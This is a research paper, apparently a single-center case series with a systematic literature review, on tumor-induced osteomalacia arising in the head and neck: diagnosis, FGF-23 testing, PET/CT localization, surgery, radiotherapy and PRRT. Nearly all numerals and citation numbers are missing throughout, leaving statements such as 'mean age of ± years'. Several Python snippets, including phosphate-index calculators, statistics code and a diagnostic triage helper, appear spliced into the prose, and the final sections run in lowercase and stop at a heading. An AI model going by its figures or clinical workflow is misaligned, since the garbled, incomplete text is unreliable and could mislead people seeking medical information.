symptoms to diagnosis being more than . years ( ). 
As a result, patients often present in a debilitated state with multiple fractures, severe muscle weakness, and loss of height due to skeletal deformities.

Key words: tumor-induced osteomalacia (TIO); oncogenic osteomalacia; head and neck; systematic review

Even with a high index of suspicion, tumor localization remains challenging, as the offending tumor may be very small and can be anywhere in the body. Complete tumor resection remains the mainstay of treatment and is known to result in dramatic resolution of symptoms. The first case of TIO was reported by Robert McCance, who treated a patient with low phosphorus levels and bone pain with high doses of vitamin D, suspecting a case of 'vitamin D resistance'; however, the symptoms did not completely resolve until a tumor found in the femur was removed ( ). Thereafter, more than cases of TIO have been reported in the literature, with more than reported since ( ). The most common tumor site is the lower extremity (> %), followed by the head and neck region (> %) ( ). There have been several reviews of the pathological characteristics of such tumors, but there is no comprehensive review describing the clinical characteristics and management of patients with TIO in the head and neck region. This article describes a single-center experience with TIO involving the head and neck region, followed by a comprehensive, clinically oriented review of the world literature.

Materials and methods

Cohort 1

Medical records of patients attending the Department of Endocrinology, KEM Hospital, Mumbai who were diagnosed with TIO from January till August were reviewed after obtaining approval from Institutional Ethics Committee II, Seth GS Medical College and KEM Hospital, Mumbai. Informed consent for photographs and for publication of clinical details and/or imaging was taken. Patients diagnosed with TIO involving the head and neck region were identified and reviewed for inclusion. Patients diagnosed with TIO in other regions, and patients with secondary TIO ( ) (including neurofibromatosis, epidermal nevus syndrome, and polyostotic fibrous dysplasia of bone), were excluded from the study. A diagnosis of TIO was considered in patients presenting with features of hypophosphatemia in the absence of a relevant family history, with evidence of renal phosphate wasting (as demonstrated by a low percentage fractional tubular reabsorption of phosphate (TRP) and a low tubular maximum for phosphate corrected for glomerular filtration rate (TmP/GFR)) and elevated fibroblast growth factor 23 (FGF-23). Only patients with anatomical/functional imaging (CT/MRI or 68Ga-DOTATATE PET/CT) demonstrating localization of the tumor in the head and neck region were included for analysis (n = ). Biochemical parameters recorded pre-operatively include serum calcium, serum phosphorus, serum alkaline phosphatase (ALP), TmP/GFR, TRP, and FGF-23 levels; post-operative parameters include serum phosphorus and FGF-23 levels.
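For readers who want to reproduce the renal phosphate-handling indices referred to above, the sketch below shows one common way to derive TRP and TmP/GFR from simultaneous spot serum and urine phosphate and creatinine values. The study itself used the Bijvoet nomogram (described in the assay paragraph that follows); this sketch instead uses the widely cited algebraic approximation to the Walton-Bijvoet nomogram, so the formula and cut-off here are illustrative assumptions rather than the exact procedure used by the authors, and the example values are invented.

def trp(serum_p, serum_cr, urine_p, urine_cr):
    """Fractional tubular reabsorption of phosphate (dimensionless, 0-1).

    serum_p, urine_p: phosphate (mg/dL); serum_cr, urine_cr: creatinine (mg/dL),
    all from simultaneously collected fasting serum and spot urine samples.
    """
    return 1.0 - (urine_p * serum_cr) / (serum_p * urine_cr)


def tmp_gfr(serum_p, serum_cr, urine_p, urine_cr):
    """Tubular maximum for phosphate corrected for GFR (mg/dL).

    Algebraic approximation to the Walton-Bijvoet nomogram (assumed here for
    illustration): if TRP <= 0.86, TmP/GFR = TRP * serum_p; otherwise
    TmP/GFR = 0.3 * TRP / (1 - 0.8 * TRP) * serum_p.
    """
    frac = trp(serum_p, serum_cr, urine_p, urine_cr)
    if frac <= 0.86:
        return frac * serum_p
    return 0.3 * frac / (1.0 - 0.8 * frac) * serum_p


if __name__ == "__main__":
    # Hypothetical TIO-like values: low serum phosphate with inappropriate phosphaturia.
    print(round(trp(1.8, 0.9, 40.0, 110.0), 2))       # ~0.82
    print(round(tmp_gfr(1.8, 0.9, 40.0, 110.0), 2))   # ~1.47 mg/dL, low, consistent with renal wasting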
Normal ranges for the various parameters at our institute are as follows: serum calcium ( – mg/dL), serum phosphorus ( – mg/dL), serum ALP (< U/L), TmP/GFR (age- and sex-adjusted values as recommended by Chong et al. ( )), TRP (> %), and C-terminal FGF-23 ( – RU/mL). Furthermore, details from the imaging studies done for localization (CT or 68Ga-DOTATATE PET/CT), the treatment modality used, and the histopathology reports were included for analysis. For patients with recurrent disease, additional information was documented, including the time of recurrence following primary management, biochemical profile, localization of the recurrent disease, and the secondary modality of treatment used.

Tubular reabsorption of phosphate was measured from phosphate and creatinine levels in spot fasting urine and serum samples taken at baseline, before starting phosphate supplements. TmP/GFR was calculated using the nomogram reported by Bijvoet et al. FGF-23 was assessed by enzyme-linked immunosorbent assay (FGF-23 (C-terminal) kit, Immunotopics, Inc., San Clemente, CA, USA); the kit's sensitivity, intra-assay coefficient of variation (CV), and inter-assay CV are RU/mL, %, and %, respectively. Serum 1,25(OH)2 vitamin D was assessed by radioimmunoassay (RIA) using a DIAsource RIA-CT kit (DIAsource ImmunoAssays SA), with an intra-assay CV of – % and an inter-assay CV of – % (each quoted at two control concentrations). Whole-body (head-to-toe) scanning with two acquisitions was obtained – h after intravenous injection of – MBq of DOTATATE labeled with 68Ga; the 68Ga was obtained from an in-house Ge/Ga generator. Scans were acquired on a GE Discovery STE PET/CT with a × matrix size and min per bed position using an iterative reconstruction algorithm; the number of bed positions depended on the height of the patient, usually – per patient. CT scans were obtained on a -slice Philips Brilliance CT scanner, while MRI scans were performed on a 1.5 Tesla Siemens Sonata (Henkestraße, Germany) MR scanner.

Cohort 2

We searched PubMed for all original and review articles published up to June (see the flowchart figure). Individual searches were carried out for the terms 'tumour-induced osteomalacia', 'oncogenic osteomalacia', and 'phosphaturic mesenchymal tumour'. All original and review articles published in English were reviewed for inclusion, and only publications describing TIO in the head and neck region were included. A secondary search for relevant publications was carried out by hand-searching the reference lists of the selected publications. Hence, in addition to the cases described in our series, we reviewed index cases from publications on TIO of the head and neck region previously reported in the literature. The clinical profile, biochemical investigations, imaging modality used for localization, location of tumor, treatment modalities used, histopathology findings, recurrence and its management, and metastasis, if any, were noted.
Whenever serum levels of calcium, phosphorus, parathyroid hormone (PTH), and 1,25(OH)2 vitamin D were available in SI units, they were converted to conventional units with online calculators for uniformity of documentation. Serum ALP was included for analysis only when available in units per liter; values reported in any other units were excluded because no suitable conversion method was available.

Statistical analysis

Statistical analysis was performed using SPSS software. Mean (± standard deviation (s.d.)) was used for continuous variables when they were normally distributed, and median (interquartile range (IQR)) was used for variables with a skewed distribution. Differences between categorical variables were analyzed using the chi-square test. A p value < 0.05 was considered significant.

Results

Cohort 1

This cohort includes seven index patients with TIO involving the head and neck region; their characteristics are described in the cohort table below. The cohort comprised four males and three females with a mean age of ± years, whose tumors were located in the paranasal sinuses (n = ), maxilla (n = ), and intracranially (n = ). All patients presented with bone pain and muscle weakness, while pathologic fractures (n = ) and local symptoms (n = ) were present in the majority of patients. The time lag from onset of symptoms to diagnosis was lengthy (mean: ± months). In four patients, the location of the tumor was suspected at initial presentation based on clinical history and examination; tumor location was then confirmed with 68Ga-DOTANOC in two patients, with MRI in one patient, and with CT in one patient. Three patients were primarily detected on 68Ga-DOTANOC/DOTATATE PET/CT; one patient had a history of epistaxis elicited retrospectively after tumor localization. Mean tumor size was ± cm. Except for one patient (who was initially operated on at another hospital), pre- and post-operative serum phosphorus and FGF-23 levels were available in all patients. Three patients were cured by the initial surgery, while four had persistent disease. No recurrence was documented in the patients cured initially (n = ) over a mean follow-up of months. Of the four patients with persistent disease, one was cured with repeat surgery only, two were cured with repeat surgery and external beam radiation therapy (EBRT), and one has stable disease after peptide receptor radionuclide therapy (PRRT). Histopathologic findings revealed phosphaturic mesenchymal tumor mixed connective tissue type (PMTMCT) in four patients, while the remaining three patients had PMT-OF (ossifying fibroma like), hemangiopericytoma, and odontogenic fibroma, respectively. Clinical images of case numbers one, five and six are shown in the figures below.

Figure: Flowchart of search strategy and selection of studies for inclusion in the systematic review (studies identified from the PubMed database plus additional case records from bibliographic review of large case series; exclusions comprised TIO of other regions, secondary TIO, PMT without osteomalacia, non-English literature, articles not relevant to TIO, and duplications/errata; the remaining articles were included for final analysis).
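The reporting conventions laid out in the Statistical analysis subsection above (normally distributed variables as mean ± s.d., skewed variables as median with IQR, categorical comparisons by chi-square) can be illustrated with a short snippet. The study used SPSS; the Python/SciPy code below is only an equivalent sketch, and all numbers in it are invented for illustration.

import numpy as np
from scipy import stats

# Hypothetical follow-up durations (months): report mean +/- SD if roughly normal,
# median (IQR) if skewed, mirroring the convention described in the Methods.
durations = np.array([6, 9, 12, 14, 18, 24, 60], dtype=float)

mean, sd = durations.mean(), durations.std(ddof=1)
median = np.median(durations)
q1, q3 = np.percentile(durations, [25, 75])
print(f"mean +/- SD: {mean:.1f} +/- {sd:.1f}; median (IQR): {median:.1f} ({q1:.1f}-{q3:.1f})")

# Chi-square test for a categorical comparison, e.g. persistence/recurrence by tumor site
# (the counts below are invented, not study data).
table = np.array([[8, 40],    # intracranial: events, no events
                  [10, 70]])  # paranasal sinuses: events, no events
chi2, p, dof, _ = stats.chi2_contingency(table)
print(f"chi-square = {chi2:.2f}, dof = {dof}, p = {p:.3f} (significant if p < 0.05)")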
Table: Details of cohort 1 patients. For each case the table lists age/sex, location of tumor, clinical features (local symptoms, features of TIO, duration in months), imaging characteristics (localizing modality and tumor size in cm), pre- and post-operative serum phosphorus and FGF-23, surgical procedure and completeness of resection, persistence, second-line modality (surgery, RT, PRRT), total duration of follow-up, status, and histopathology. Abbreviations: F, fractures; FESS, functional endoscopic sinus surgery; IMRT, intensity-modulated radiation therapy; MW, muscle weakness; NA, not available; OF, ossifying fibroma like; P, pain; PE, physical examination; PMTMCT, phosphaturic mesenchymal tumor mixed connective tissue type; PRRT, peptide receptor radionuclide therapy; RT, radiation therapy.

Cohort 2

This cohort consists of index patients from publications. Pertinent data for the index patients are provided in the literature-review table, and clinically relevant parameters are summarized in the literature-summary table; results obtained with two different assay methods are tabulated separately. Owing to heterogeneity in the reporting of the various parameters, the number of cases included (as denominator) is specified for each parameter. The mean age was ± years, with an equal male:female ratio.
The reported frequency of tumor sites, in descending order, is paranasal sinuses, mandible, intracranial, maxilla, oral cavity, and others. Approximately half of the patients ( %) had evident local symptoms. Bone pain and muscle weakness were the most commonly reported complaints. Late complications of hypophosphatemia, such as fractures ( %) and bony deformities including kyphosis/scoliosis with resultant height loss ( %), were seen in a significant number of patients. Most patients were diagnosed late in their disease course, despite early access to health care, with the median duration from symptom onset being almost years. Among the patients with available data, a median elevation of FGF-23 of times the upper limit of normal (ULN) has been reported, with an interquartile range (IQR) of – × ULN. The primary treatment modality was surgery in most patients ( %). Two patients with intracranial tumors, who declined surgery, were treated with primary EBRT. In addition, two patients received immediate post-operative EBRT for prevention of recurrence, because of concern about incomplete tumor removal.

Figure (case ): A -year-old female presented with bone pains and multiple fractures for years. On examination, an approximately cm round swelling in the right upper alveolus was seen (A). Preoperative chest radiograph (image contrast adjusted) showing a Looser's zone along the lateral border of the scapula (arrows), suggestive of osteomalacia (B). Axial contrast-enhanced CT image, soft tissue window, showing a small enhancing lesion in the right upper alveolus (arrow) extending from the canine to the first molar tooth and causing erosion of the right upper alveolus (C). 68Ga-DOTATATE PET scan showing increased uptake at the level of the right maxillary alveolus (arrow) (D). After excision, histopathological examination showed a tumor comprising spindle cells with scattered osteoclastic giant cells bearing histologic resemblance to giant cell granuloma (odontogenic fibroma) (E) (H&E).

Figure (case ): A -year-old female presenting with pain in both groins and difficulty in walking of -year duration. As investigations confirmed the diagnosis of FGF-23-dependent hypophosphatemic osteomalacia, a 68Ga-DOTATATE PET scan was done to locate the tumor, which showed increased uptake in the left side of the base of the skull (dashed arrows) (A). Corresponding axial CT images (B) show a soft tissue density lesion involving the occipital bone on the left side with erosion of the mastoid and petrous parts of the adjacent temporal bone. Retromastoid craniotomy with tumor excision was done. Histopathological examination showed a hypercellular tumor composed of prominent small blood vessels with areas of hemorrhage (H&E) (D). After the first surgery, repeat 68Ga-DOTATATE scanning and corresponding CT images showed residual uptake in the left base of the skull (dashed arrows) within the soft tissue density lesion involving the occipital bone, with erosion of the mastoid and petrous parts of the adjacent temporal bone (E). After a failed second surgery, the patient now has stable disease after two cycles of PRRT.
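Because the FGF-23 results pooled in this review come from different assays (C-terminal in RU/mL, intact in pg/mL) with different reference ranges, pre-operative elevations are expressed as multiples of each assay's upper limit of normal, as noted above. A minimal sketch of that normalization, with made-up values and reference ranges, might look like this:

from statistics import median

def fold_uln(value, upper_limit_of_normal):
    """Express an FGF-23 result as a multiple of its own assay's upper limit of normal."""
    return value / upper_limit_of_normal

# Hypothetical pre-operative results; each tuple is (measured value, assay ULN).
# Mixing C-terminal (RU/mL) and intact (pg/mL) results is only meaningful after
# normalizing each to its own reference range.
cases = [(540, 180), (96, 71), (1200, 150), (88, 52)]

folds = sorted(fold_uln(v, uln) for v, uln in cases)
print([round(f, 1) for f in folds])   # per-case fold elevation
print(round(median(folds), 1))        # median fold elevation, as reported in the review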
Of the patients for whom outcome data were available, patients had a complete initial response to surgery, patients had persistent disease, and patients had recurrence, defined as worsening of post-operatively documented normal biochemistry over a variable period of – months. Patients with persistent/recurrent disease (n = ) were predominantly managed with surgery ( %) and/or radiotherapy ( %). Among these, patients were reported to be alive with no evidence of disease (ANED), and the remaining patients were managed with phosphorus supplements with or without other treatment modalities. Four patients had metastatic disease with lymph node and/or lung metastases. Histopathologically, PMTMCT ( %) remains the most commonly reported tumor type, followed by hemangiopericytoma ( %), PMT of mixed epithelial and connective tissue type ( %), giant cell tumor ( %), and odontogenic fibroma ( %). Other rare tumor types are shown in the literature-summary table.

Discussion

TIO is a rare and underreported condition owing to a lack of awareness of its characteristic clinical and biochemical profile among treating clinicians. Through this study, we aim to highlight our experience with TIO cases involving the head and neck region and to provide a review of the published literature analyzed on a per-patient basis. This should increase awareness and provide valuable insight into critical management issues for this rare diagnosis.

Cohort 1

A significant time gap between initial presentation and diagnosis persists even in the presence of local symptoms ( ). For any atypical head and neck mass, the clinician should enquire into a history relevant to osteomalacia, and for a symptomatic patient appropriate biochemistry (serum calcium, serum phosphorus, and alkaline phosphatase) should be requested. Conversely, in a patient with non-localized TIO, the clinician should examine the oral and nasal cavities for palpable swellings and enquire about relevant local symptoms. At our center we carry out a complete biochemical evaluation for TIO, which includes calcium studies (serum calcium, serum phosphorus, ALP), TmP/GFR, 1,25(OH)2 vitamin D, and FGF-23 levels. FGF-23 serves as a diagnostic marker as well as an indicator of residual disease or recurrence during long-term follow-up. Thereafter, functional imaging with 68Ga-DOTANOC PET/CT is done for localization; its superiority to FDG-PET/CT is well established ( , , ). Functional imaging is followed by appropriate anatomic imaging to determine tumor extent and plan surgical management. Alternatively, in a TIO patient presenting with local symptoms or a mass in the head and neck region, anatomic imaging (CT/MRI) followed by biopsy can also be used.

Figure (case ): A -year-old female presenting with pain in both groins, difficulty in walking, and multiple fractures of -year duration. There was a past history of dental surgery for a 'gum swelling'. On examination there was a swelling in the right upper alveolar region (A). X-ray of the right forearm, AP view (image contrast adjusted), showing an ulnar shaft fracture (B). MRI of the hips showing bilateral femoral neck insufficiency fractures that had been reported as 'bilateral avascular necrosis' (C). 68Ga-DOTANOC scan showing uptake in the right maxillary tumor (D). CECT PNS, axial view, showing a cm tumor in the right maxillary region (E). The patient was cured with right maxillectomy and osseous reconstruction. Histopathology showed a tumor composed of cellular connective tissue intermixed with woven bone displaying osteoblastic rimming (i.e., ossifying fibroma-like histology) (H&E).
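The center's diagnostic sequence described above (biochemistry first, then SSTR-based functional imaging, then anatomic imaging, with direct anatomic imaging plus biopsy as an alternative when a local mass is evident) can be restated as a small triage helper. This is only an illustrative paraphrase of the workflow in the text, not a validated clinical algorithm; the function name, inputs, and branching are invented for the sketch.

def suggest_workup(mass_evident, hypophosphatemia, renal_phosphate_wasting, fgf23_elevated):
    """Illustrative restatement of the diagnostic sequence described in the text.

    Not a clinical decision tool; inputs are simplified booleans.
    """
    steps = ["Biochemistry: serum calcium, phosphorus, ALP, TmP/GFR, 1,25(OH)2 vitamin D, FGF-23"]
    biochemistry_suggests_tio = hypophosphatemia and renal_phosphate_wasting and fgf23_elevated
    if not biochemistry_suggests_tio:
        steps.append("TIO unlikely on current biochemistry; reassess or consider other causes")
        return steps
    if mass_evident:
        # Local symptoms or a visible/palpable head-and-neck mass: image the mass directly.
        steps.append("Anatomic imaging (CT/MRI) of the mass, followed by biopsy")
    else:
        steps.append("Functional imaging (SSTR-based PET/CT) for localization")
        steps.append("Anatomic imaging (CT/MRI) of the localized site to define extent and plan surgery")
    return steps


if __name__ == "__main__":
    for step in suggest_workup(mass_evident=False, hypophosphatemia=True,
                               renal_phosphate_wasting=True, fgf23_elevated=True):
        print("-", step)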
Table: Review of published literature on head and neck TIO cases, listing the index cases with relevant data. For each case the table gives the author, age/sex, location of tumor, duration of symptoms, localizing imaging, pre- and post-surgery FGF-23, persistence/recurrence, secondary modality of treatment, and histopathology report (HPR). Abbreviations: F, female; M, male; N, normal value; NA, not available; OF, ossifying fibroma like; PE, physical examination; PMTMCT, phosphaturic mesenchymal tumor mixed connective tissue type; POD, post-op day; PRRT, peptide receptor radionuclide therapy; RT, radiation therapy; SVS, selective venous sampling of FGF-23; UD, undetectable.

Table: Summary of literature review. For each parameter the table reports the value and the number of patients with available data: age; sex; location of tumor (paranasal sinuses, mandible, intracranial, maxilla, oral cavity, skull, parotid, posterior neck, cervical vertebra, infratemporal fossa, mastoid antrum, thyroid); local symptoms; hypophosphatemic symptoms (muscle weakness, fractures, bone pains, bony deformities); duration of symptoms; biochemical profile (serum calcium, pre- and post-operative serum phosphorus, serum alkaline phosphatase, TmP/GFR, TRP, PTH, 1,25(OH)2 vitamin D); pre- and post-operative FGF-23 (fold ULN, C-terminal, and intact assays); tumor size; localization imaging (history and physical examination, X-ray, CT, MRI, octreotide scintigraphy, FDG-PET/CT, Ga-DOTA-based PET/CT, selective venous sampling of FGF-23); primary modality of treatment (surgery, radiation therapy, combined surgery plus radiation therapy); complete response to primary treatment; persistent disease; follow-up; recurrence and time to recurrence; site-wise persistence/recurrence; secondary modality of treatment (surgery, RT, chemotherapy, cinacalcet, octreotide, radiofrequency ablation, PRRT, others); metastasis; and histopathology (PMTMCT, PMT ossifying fibroma like, PMT mixed epithelial and connective tissue type, malignant PMTMCT, hemangiopericytoma, giant cell tumor, odontogenic fibroma, glomangiopericytoma, malignant schwannoma, meningioma, salivary basal cell adenoma, ameloblastic fibrosarcoma, primitive mesenchymal tumor, arteriovenous hemangioma, spindle cell tumor with PMT features, cellular non-descript, and chronic inflammatory tissue with fibrosis and epithelial cell rests).
Complete surgical removal with a wide margin of excision remains the cornerstone of management in these cases ( ). This is particularly difficult in intracranial tumors, resulting in persistent disease as noted in both of our patients with intracranial tumors. Serum phosphorus and FGF-23 levels are used for post-operative surveillance. The half-life of FGF-23 is very short, so it can be documented immediately post-operatively ( ). Persistent post-operative elevation of FGF-23 was noted in two patients (cases and ), which normalized on re-evaluation after months; this observation has been reported previously, particularly with the C-terminal FGF-23 assay ( , ). Phosphate supplements are discontinued post-operatively to allow surveillance, and reimaging is performed in patients with persistent symptoms and biochemically active disease. In recurrent or persistent cases, complete tumor removal resulted in cure in two patients; hence, this remains the preferred approach at our institute. In inoperable cases, two patients received external beam radiotherapy (EBRT) and one patient received peptide receptor radionuclide therapy (PRRT). In one patient (case ), EBRT was given after the first surgery because of the difficult tumor location at the petrous apex; he had a gradual and complete response to RT over the next years. In another scenario (case ), the patient had persistent disease after functional endoscopic sinus surgery (FESS) for a left ethmoid sinus tumor. Following two repeat FESS procedures, the patient was considered for EBRT for persistent disease and received IMRT ( Gy in fractions).
Serum phosphorus and FGF-23 normalized gradually over one and a half years, and this patient, who was previously bedbound, is now walking without any support. One patient (case ) in our cohort received PRRT for persistent disease after two surgeries for a base-of-skull tumor ( ). As the tumor was 68Ga-DOTATATE avid with a Krenning score of IV, the patient was considered for PRRT after a thorough discussion in a multidisciplinary meeting. This patient has stable disease after two cycles of PRRT with – µCi of 177Lu-DOTATATE. PMTMCT remains the commonest histopathologic entity in these patients. We also report one patient each with PMT-OF like, odontogenic fibroma, and hemangiopericytoma histology in our cohort; detailed histopathological findings for cases three, four and six have been published previously ( ). Although the sample size of cohort 1 was small, its epidemiological data are similar to cohort 2. There is an increased prevalence of local symptoms at presentation and a higher rate of persistence after primary surgery at our center, which could be attributed to referral bias at a tertiary care center.

Cohort 2

Here we present a detailed review of the published English literature on TIO cases involving the head and neck region (n = ) ( ). This is the largest series of its kind published to date.

Epidemiology

As in the overall TIO literature, an almost equal male:female ratio is reported in head and neck TIO patients ( ). Middle age is the most common age at presentation, and three pediatric cases have been reported so far. TIO is a difficult diagnosis in pediatric patients, as heritable hypophosphatemic rickets is a more likely diagnosis unless the tumor is evident. Fernández-Cooke et al. reported a -year-old child with rickets and a jaw tumor.
Two years went by before a link was established between the two and a diagnosis of TIO was made ( ). In the case described by Reyes-Mugica et al., the heightened awareness of the pediatric endocrinologist for this condition led to early screening with imaging and subsequent surgical removal, resulting in cure within weeks of the onset of symptoms ( ). In the third case, reported by Wu et al., the duration of hypophosphatemic symptoms was likewise years ( ). The time from symptom onset to final diagnosis remains dreadfully long: in this series of head and neck TIO cases, only % (n = ) were diagnosed in the first year of disease onset, the majority of them having local symptoms at presentation. Feng et al. observed a misdiagnosis rate of % with case-times of misdiagnosis among their cases of TIO, even though hypophosphatemia was evident in % of cases ( ). The reasons cited for misdiagnosis were disease rarity, insidious onset, nonspecific clinical manifestations, and poor recognition by the clinician. The presence of local compressive symptoms and/or swelling in approximately % of patients in this review highlights the problem of delayed or missed diagnosis, as musculoskeletal symptoms are ignored until presentation with advanced local symptoms.

Biochemical profile

The typical biochemical profile in TIO is straightforward: hypophosphatemia with normocalcemia, moderately elevated ALP, normal PTH, inappropriately normal-to-high urinary phosphate excretion, low serum 1,25(OH)2 vitamin D, and elevated FGF-23 levels ( ). FGF-23 is useful as a tumor marker. Based on two case reports, the half-life of FGF-23 is between and minutes ( , ). More recently, Hana et al. reported the half-life of FGF-23 to be minutes in a patient with an intracranial PMTMCT, using the intact FGF-23 assay ( ). This allows FGF-23 to be used for intraoperative monitoring to determine the extent of tumor removal. An immediate post-operative decline in FGF-23 levels into the normal range has been reported by other investigators ( , , , ) as well. Elston et al. reported a discordant post-operative increase in C-terminal FGF-23, which has not been confirmed by other studies ( ). As previously stated, persistent elevation of C-terminal FGF-23 in the immediate post-operative period has been documented despite complete tumor removal ( , ). With no reports on the levels of other postulated phosphatonins, such as matrix extracellular phosphoglycoprotein (MEPE) and secreted frizzled-related protein 4 (sFRP-4), in patients with TIO, their role remains unclear ( ).

Location of tumor

The most common site for TIO in the head and neck region is the paranasal sinuses; among them, the ethmoid sinuses are the most common site, followed by the maxillary, sphenoid, and frontal sinuses. The most common tumors are PMTMCT, hemangiopericytoma, and glomangiopericytoma, in descending order.
third position is for intracranial tumors involving anterior cranial fossa, middle cranial fossa, and posterior cranial fossa, in descending order of prevalence. reported tumors include pmtmct, hemangiopericytoma and meningioma. tumors of oral cavity include gingival tumors (molar/premolar), tongue and buccal vestibule in that order of occurrence. apart from pmtmct (including malignant) and hemangiopericytoma, tumors from this region also include giant cell tumor and ossifying fibroma. rarely tumors have been reported from skull, parotid glands, posterior neck, infratemporal fossa, mastoid antrum, thyroid and vertebra. localization imaging classically, history of local compressive symptoms and/or visible mass on physical examination is instrumental in diagnosing tio even in this current era of sensitive imaging modalities. earlier clinicians were dependent on physical examination and x-rays for diagnosing tio. renton et  al., nitzan et  al., and nomura et  al. have localized head and neck tio through x-rays alone ( , , ). with the introduction of ct scans ( – ), % tumors in the head and neck region were localized with this modality. the first localization of head and neck tio on mri was reported by avila et  al. in using mr skeletal survey ( ). following in vitro demonstration of somatostatin receptors (sstrs) by reubi et al. ( ), scintigraphic studies using in-pentetreotide for tumor localization was published by de beur et  al. in ( ). subsequently, localization with mtc-mibi and fdg-pet scans was reported ( , ). use of fdg-pet was limited due to poor specificity of non-receptor-based imaging, and slow-growing nature of these tumors resulting in false- negative results ( ). with improved spatial resolution, lower radiation dose and more rapid whole-body tomographic imaging of pet/ct studies in comparison to scintigraphy, ga-dota-based pet/ct scans became the investigation modality of choice in tio patients ( , ). various studies have shown superiority of ga-dotatate pet/ct and ga-dotanoc pet/ct over fdg-pet/ct and octreoscan for tumor localization in tio ( , , ). the largest such study is that of patients by zhang et al. using ga-dotatate pet/ct reported % sensitivity and . % specificity in lesion detection ( ). use of positron emitter radiotracer ga enabling pet-based imaging along with higher affinity sstr ligands like dotatate (sstr > ) and dotanoc (sstr , , ) are postulated to be responsible for enhanced sensitivity of ga-dota-based pet/ct over octreoscan ( ). thereafter, singh et  al. highlighted the issue of multiple low-grade benign uptakes using ga-dotanoc pet/ct especially at fracture sites and described the use of suvmax and anatomical imaging showing soft tissue component in the lesion to pinpoint the causal lesion ( ). in summary, ga-dota-based pet/ct is superior to other functional studies like fdg-pet and octreoscan, but its utilization will depend on local availability and expertise ( ). selective venous sampling of fgf- has been studied for accurate localization of tio. kobayashi et  al. used selective venous sampling as an initial guiding modality localizing the tumor to right head and neck region, although on retrospect distortion of right external ear canal was noted and no prior functional imaging was done to localize the tumor ( ). andreopoulou et  al. reported sensitivity of % and specificity of % at fgf- concentration ratio of . between the venous drainage of the tumor bed and general circulation after sampling major veins and their branches ( ). 
they concluded that selective venous sampling is not useful in the absence of a suspicious lesion on imaging studies, and that its use should be limited to cases with multiple suspicious sites or to pre-resection confirmation in anatomically challenging cases. lee et al. subsequently reported contrasting results: in their cohort, five patients negative on both indium- octreotide scintigraphy and fdg-pet/ct were subjected to selective blood sampling from to sites ( ), and the culprit lesion was identified on follow-up with targeted mri or whole-body ga-dotatoc in four patients. tarasova et al. and schober et al. used selective venous fgf- sampling to confirm that an sstr-expressing meningioma was the fgf- -secreting culprit lesion, as many meningiomas are avid on sstr-based imaging but may not be the source of fgf- ( ). in summary, in the current era of sstr-based imaging, the role of this modality seems limited to cases with multiple suspicious uptake sites, to intracranial lesions consistent with meningioma and, lastly, to imaging-negative cases, where it can identify a target for focused follow-up imaging.

treatment
primary modality
complete surgical resection with an adequate wide margin remains the treatment of choice in these tumors ( ). this is supported in head and neck tio cases, where anatomical sites less amenable to this approach, for example intracranial tumors, have a higher persistence or recurrence rate. hana et al. also reiterated this principle in their report of a recurrent anterior skull base tumor, in which en bloc tumor removal followed by filling of the large skull base defect with a pedicled subgaleal flap resulted in absence of recurrence over a -month follow-up ( ). stereotactic radiotherapy has been described as the primary modality in two cases. both patients had frontal lobe tumors and both refused surgery. one patient had a lower plasma fgf- and a lower oral phosphorus requirement at -month follow-up; the details of radiotherapy are not described in this case report ( ). the second patient received gy of fractionated stereotactic radiotherapy over weeks ( ). on follow-up, the patient was off phosphorus supplements and had a normal fgf- concentration after years. the tumor was stable, with areas of multiple small hemorrhages, and bmd improved by approximately % with no evident new fracture. as these tumors are slow growing, radiotherapy is deemed less effective ( ). surgery combined with adjuvant post-operative radiotherapy was used by john et al. in a case of invasive 'malignant schwannoma' ( ). over . years of follow-up, serum phosphorus normalized but , (oh) vitamin d remained persistently low, and mri showed no evidence of residual or recurrent tumor. similarly, lee et al. described a case in which the patient received post-operative radiotherapy following incomplete removal of an ethmoid tumor, which resulted in normal serum phosphorus with no residual tumor on mri after completion of radiotherapy ( ). in summary, although complete surgical excision remains the treatment modality of choice, radiation therapy can be used in rare cases, though a slow response should be expected.
persistent/recurrent disease
persistent or recurrent disease signifies failure of complete resection of the tumor after primary excision. this occurs more commonly in intracranial disease and oral cavity lesions, where en bloc tumor removal is challenging and leads to higher surgical morbidity and complications. serial biochemical follow-up is essential, as true recurrences after complete biochemical resolution are known, but usually it is the recurrence of symptoms that brings the disease to the surface. after anatomical imaging to confirm the site of tumor recurrence, re-exploration of the surgical site with attempted en bloc removal remains the preferred approach. out of eleven patients with persistent/recurrent disease who were alive with no evidence of disease (aned) on follow-up, eight were treated with re-surgery alone. in persistent cases, multiple re-surgeries, radiotherapy, cinacalcet and octreotide have been used with limited success. seufert et al. reported a patient with a left thigh tio localized on octreotide scintigraphy who had complete resolution of phosphaturia and normalization of serum phosphorus with – µg of octreotide thrice a day in the preoperative setting ( ). however, this initial success has not been replicated in subsequent studies ( , ). extrapolating from patients with hypoparathyroidism, who have elevated fgf- and serum phosphorus levels, geller et al. advocated the use of cinacalcet in the treatment of tio ( ), but the development of hypercalciuria and hypocalcemia limits the use of cinacalcet in this cohort. disease stability with dasatinib has been reported ( ). as these tumors also express sstr, prrt remains a potentially useful option in tumors showing krenning iii/iv uptake on ga-dotatate pet/ct ( ). two radiopeptides, y-dotatoc and lu-dotatate, have been used successfully for more than a decade in the treatment of advanced neuroendocrine tumors (nets) ( ). after binding to sstr, these peptides are internalized in tumor cells, and the breakdown products released in lysosomes mediate radioactivity-induced local damage ( ). apart from our case, we could not find any other experience with prrt in the tio literature. in patients with persistent disease, treatment with oral phosphate supplements and calcitriol is continued for symptomatic improvement.

metastases
four cases of malignant tio in the head and neck region have been reported so far: three originated from the oral cavity and one from the mandible. uramoto et al. described a case of malignant pmtmct involving the tongue with lymph node metastases, treated with two surgeries followed by radiation therapy, with persistent disease at last follow-up ( ). bergwitz et al. reported a patient with ameloblastic fibrosarcoma of the mandible with pulmonary and lymph node metastases ( ); the patient had multiple recurrences and was managed with repeated surgeries and, lastly, cinacalcet, with persistent hypophosphatemia. fatani et al. reported an interesting case of malignant pmtmct arising from the oral cavity in a patient who, after years of follow-up, developed lung metastases that were resected in addition to multiple surgeries for the primary disease ( ); the patient was normophosphatemic on follow-up. the fourth case of malignant pmtmct was reported by wasserman et al. ( ). the tumor involved the nose, lip and mouth; no further follow-up or management details have been reported.

histopathology
